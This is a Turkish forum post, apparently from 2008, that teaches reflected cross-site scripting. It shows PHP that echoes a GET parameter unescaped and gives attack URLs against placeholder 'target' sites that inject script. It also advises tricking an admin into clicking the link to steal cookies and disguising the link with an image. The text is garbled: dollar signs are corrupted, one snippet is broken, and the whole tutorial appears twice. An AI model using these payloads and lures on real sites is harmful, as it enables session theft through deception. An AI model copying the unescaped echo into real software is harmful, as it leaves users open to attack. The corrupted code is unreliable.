- 8 Ağu 2008
- 21
- 0
Bir Php Kod oLsun:
Kod:
form action="kruis.php" method="GET" />
Hoşgeldiniz!
<p>Isminizi girin: <input type="text" name="name_1" /><br />
<input type="submit" value="Go" /></p><br>
</form>
<?php
echo "<p>Nickiniz<br />";
echo (ş_GET[name_1]);
?>
dosyanın adı kruis.php oLsun...
Xss açığını yaratan hasarlı kod
Kod:
echo (ş_GET[name_1])
Böyle bir kodla karşılaştık diyelim :
Kod:
http://hedefsiteadresi.com/kruis.php?name_1=**********alert(1);</script>
Site mysql ile çalışan bir database'li sistemse, admin'e bir şekilde tıklattırarak cookie alınabilir.Bu, güncel açıklar bölümümüzde anlatıldı.
Tek hasarlı kodu bu mu derseniz tabi ki değil ;
kruis.php 'de şu kodlar olsun :
Kod:
here ş_GET['Exploit]
Saldırılacak şekil :
http://www.hedefsite.com/kruis.php?Exploit=**********alert(1);</script>
Sonuna herhangi bir resim de eklenilip, amacımızın cookie çalmakla bir ilgisi olmadığı yönünde yanıltma yoluna gidebiliriz.
Kod:
form action="kruis.php" method="GET" />
Hoşgeldiniz!
<p>Isminizi girin: <input type="text" name="name_1" /><br />
<input type="submit" value="Go" /></p><br>
</form>
<?php
echo "<p>Nickiniz<br />";
echo (ş_GET[name_1]);
?>
dosyanın adı kruis.php oLsun...
Xss açığını yaratan hasarlı kod
Kod:
echo (ş_GET[name_1])
Böyle bir kodla karşılaştık diyelim :
Kod:
http://hedefsiteadresi.com/kruis.php?name_1=**********alert(1);</script>
Site mysql ile çalışan bir database'li sistemse, admin'e bir şekilde tıklattırarak cookie alınabilir.Bu, güncel açıklar bölümümüzde anlatıldı.
Tek hasarlı kodu bu mu derseniz tabi ki değil ;
kruis.php 'de şu kodlar olsun :
Kod:
here ş_GET['Exploit]
Saldırılacak şekil :
http://www.hedefsite.com/kruis.php?Exploit=**********alert(1);</script>
Sonuna herhangi bir resim de eklenilip, amacımızın cookie çalmakla bir ilgisi olmadığı yönünde yanıltma yoluna gidebiliriz.